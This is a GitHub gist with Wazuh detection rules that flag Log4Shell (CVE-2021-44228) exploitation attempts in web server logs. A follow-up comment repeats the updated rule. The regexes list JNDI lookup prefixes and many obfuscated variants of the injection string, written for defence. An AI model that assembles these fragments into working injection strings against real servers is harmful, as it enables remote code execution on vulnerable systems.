Skip to content

Instantly share code, notes, and snippets.

@apertureless

apertureless/rules.xml

Last active December 16, 2021 11:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save apertureless/1ca8022f85effaa066b19d7285ade00f to your computer and use it in GitHub Desktop.
Save apertureless/1ca8022f85effaa066b19d7285ade00f to your computer and use it in GitHub Desktop.
Download ZIP
Log4j Wazuh
Raw
rules.xml
<group name="web,">
<rule id="100134" level="8">
<if_sid>31108, 31100</if_sid>
<regex>\${jndi:ldap:|\${jndi:rmi:|\${jndi:ldaps:|\${jndi:dns:|\${jndi:iiop:|\${jndi:http:|\${jndi:nis:|\${jndi:nds:|\${jndi:corba:|\${::-i}|\${lower:|\${upper:\$</regex>
<description>Log4Shell - Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228</description>
</rule>
<rule id="100135" level="8">
<if_sid>31108, 31100, 31120</if_sid>
<regex>\S%7Bjndi\S|\$%7Bjndi\S|%2524%257Bjndi|%2F%252524%25257Bjndi%3A|\${jndi:\${lower:|\${::-j}\${|\${\${env:BARFOO:-j}|\${::-l}\${::-d}\${::-a}\${::-p}|\${base64:JHtqbmRp|\${\${upper:j}\${upper:n}\${upper:d}\${upper:i}|\${\${upper:j}\${upper:n}\${upper:d}\${lower:i}|\${\${upper:j}\${upper:n}\${lower:d}\${upper:i}|\${\${upper:j}\${upper:n}\${lower:d}\${lower:i}|\${\${upper:j}\${lower:n}\${upper:d}\${upper:i}|\${\${upper:j}\${lower:n}\${upper:d}\${lower:i}|\${\${upper:j}\${lower:n}\${lower:d}\${upper:i}|\${\${upper:j}\${lower:n}\${lower:d}\${lower:i}|\${\${lower:j}\${upper:n}\${upper:d}\${upper:i}|\${\${lower:j}\${upper:n}\${upper:d}\${lower:i}|\${\${lower:j}\${upper:n}\${lower:d}\${upper:i}|\${\${lower:j}\${upper:n}\${lower:d}\${lower:i}|\${\${lower:j}\${lower:n}\${upper:d}\${upper:i}|\${\${lower:j}\${lower:n}\${upper:d}\${lower:i}|\${\${lower:j}\${lower:n}\${lower:d}\${upper:i}|\${\${lower:j}\${lower:n}\${lower:d}\${lower:i}</regex>
<description>Log4Shell - Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228</description>
</rule>
</group>
@apertureless
Copy link
Author

Added updated Rule

<rule id="100135" level="8">
   <if_sid>31108, 31100, 31120</if_sid>
   <regex>\S%7Bjndi\S|\$%7Bjndi\S|%2524%257Bjndi|%2F%252524%25257Bjndi%3A|\${jndi:\${lower:|\${::-j}\${|\${\${env:BARFOO:-j}|\${::-l}\${::-d}\${::-a}\${::-p}|\${base64:JHtqbmRp|\${\${upper:j}\${upper:n}\${upper:d}\${upper:i}|\${\${upper:j}\${upper:n}\${upper:d}\${lower:i}|\${\${upper:j}\${upper:n}\${lower:d}\${upper:i}|\${\${upper:j}\${upper:n}\${lower:d}\${lower:i}|\${\${upper:j}\${lower:n}\${upper:d}\${upper:i}|\${\${upper:j}\${lower:n}\${upper:d}\${lower:i}|\${\${upper:j}\${lower:n}\${lower:d}\${upper:i}|\${\${upper:j}\${lower:n}\${lower:d}\${lower:i}|\${\${lower:j}\${upper:n}\${upper:d}\${upper:i}|\${\${lower:j}\${upper:n}\${upper:d}\${lower:i}|\${\${lower:j}\${upper:n}\${lower:d}\${upper:i}|\${\${lower:j}\${upper:n}\${lower:d}\${lower:i}|\${\${lower:j}\${lower:n}\${upper:d}\${upper:i}|\${\${lower:j}\${lower:n}\${upper:d}\${lower:i}|\${\${lower:j}\${lower:n}\${lower:d}\${upper:i}|\${\${lower:j}\${lower:n}\${lower:d}\${lower:i}</regex>
   <description>Log4Shell - Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228</description>
 </rule>

From Bruno Olivera in the wazuh slack channel.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment